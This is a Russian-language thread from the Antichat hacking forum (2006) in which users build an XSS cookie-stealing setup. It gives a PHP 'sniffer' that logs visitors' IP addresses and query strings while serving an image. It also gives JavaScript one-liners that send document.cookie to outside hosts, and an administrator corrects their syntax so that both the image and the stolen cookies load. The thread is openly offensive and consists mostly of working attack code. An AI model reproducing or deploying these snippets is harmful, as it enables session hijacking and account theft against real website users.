Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

15.05.2006, 09:07
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме: 941818
Репутация:
569
|
|
2 EST a1ien
А это и есть ответ на второй вопрос...
Сообщение от LoFFi
Да, и вот тебе пример сниффа....
PHP код:
<?
$query = $_SERVER['QUERY_STRING'];
$ip = $_SERVER['REMOTE_ADDR'];
if(!file_exists("log.txt")) fclose(fopen("log.txt","w"));
$out = fopen("log.txt","a");
fputs($out,"IP:".$ip."Query:".$query);
fclose($out);
header("Content-Type: image/jpg");
$img = fopen("image.jpg","rb");
fpassthru($img);
fclose($img);
?>
|
|
|

15.05.2006, 09:27
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме: 1269624
Репутация:
114
|
|
Если открываеш таим javascriptom то какртина не отображается, а надо чтобы и картинка отображалясь и куки тырились.
А снифер тут непричём он картину то так выводет а через javascript нет.
Вот к примеру ссылка на html с этим скриптом http://est.jino-net.ru/1.html
Здесь даже наптсано
Код:
img = new Image(); img.src = "http://est.jino-net.ru/xss/sm.gif";
Даже так он картину неотображает.
sm.gif - обычная каринка.
Последний раз редактировалось EST a1ien; 15.05.2006 в 09:36..
|
|
|

15.05.2006, 09:58
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме: 941818
Репутация:
569
|
|
2 EST a1ien
короче, ты споришь ни о чем. Да, мне лень описывать принцип работы подобного сниффера. но не потому что я ленивая скотина, а потому что это способ описан уже 300 раз и используется каждым вторым!
|
|
|

15.05.2006, 10:48
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме: 1269624
Репутация:
114
|
|
Да блин мы общаемся на разных языках.
Я говорю про javascript а ты про php снифф.
А прошу сказать как при помощи js отправить запрос к снифу но при этом мне надо что бы отобразилась картинка.
Просто вот таким скриптом
img = new Image(); img.src = "http://site.ru/img.gif?"+document.cookie;
Отправляются куки, но неотображается картинка.
А вот таким
document.write('<img src="http://est.jino-net.ru/xss/s.php"+document.cookie>');
Отображается картинка но неотправляются куки.
А мне надо чтобы и картинка отображалась и куки отправлялись.
Хотя я уже и без вас понял как это зделать просто запихнуть вот такой скрипт
img = new Image(); img.src = "http://site.ru/img.gif?"+document.cookie;
document.write('<img src="http://site.ru/img.gif">');
|
|
|

15.05.2006, 11:07
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме: 941818
Репутация:
569
|
|
лол. EST a1ien, прежде чем ругать людей, которые пытаются тебе помочь, разбирись со своей задачей и попробуй грамотно выложить ее в своем посте.
|
|
|

15.05.2006, 11:20
|
|
Administrator
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме: 20377164
Репутация:
0
|
|
Сообщение от EST a1ien
Да блин мы общаемся на разных языках.
Я говорю про javascript а ты про php снифф.
А прошу сказать как при помощи js отправить запрос к снифу но при этом мне надо что бы отобразилась картинка.
Просто вот таким скриптом
Отправляются куки, но неотображается картинка.
А вот таким
Отображается картинка но неотправляются куки.
А мне надо чтобы и картинка отображалась и куки отправлялись.
Хотя я уже и без вас понял как это зделать просто запихнуть вот такой скрипт
По document.write('<img src="http://est.jino-net.ru/xss/s.php"+document.cookie>');
куки не будут писаться, потому что и не должны так писаться. Просто ошибка в этой строчке (где не скажу).
|
|
|

15.05.2006, 13:54
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме: 1269624
Репутация:
114
|
|
2Trinux я тебя неругал сори если чтото непонравилось как я говорил.
2Егорыч+++ document.write('<img src="http://est.jino-net.ru/xss/s.php?"+document.cookie>');
Правильно если нет то просьба подсказать.
|
|
|

15.05.2006, 14:01
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме: 1269624
Репутация:
114
|
|
Короче чтобы небыло непоняток выражу свою мысль еще раз.
Допустим есть снифер http://site.ru/s.gif который отображает картинку.
Дак вот мне нужен javascript который пошлёт куки и отобразит картинку.
|
|
|

15.05.2006, 14:12
|
|
Administrator
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме: 20377164
Репутация:
0
|
|
Сообщение от EST a1ien
2Trinux я тебя неругал сори если чтото непонравилось как я говорил.
2Егорыч+++ document.write('<img src="http://est.jino-net.ru/xss/s.php?"+document.cookie>');
Правильно если нет то просьба подсказать.
document.write("<img src="http://est.jino-net.ru/xss/s.php? "+document.cookie+">");
P. S. Послать куки только вставляя одну картинку НЕЛЬЗЯ. Куки бирутся ява скриптом.
Последний раз редактировалось Егорыч+++; 15.05.2006 в 14:16..
|
|
|

15.05.2006, 14:26
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме: 1269624
Репутация:
114
|
|
Ага большое спасибо.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|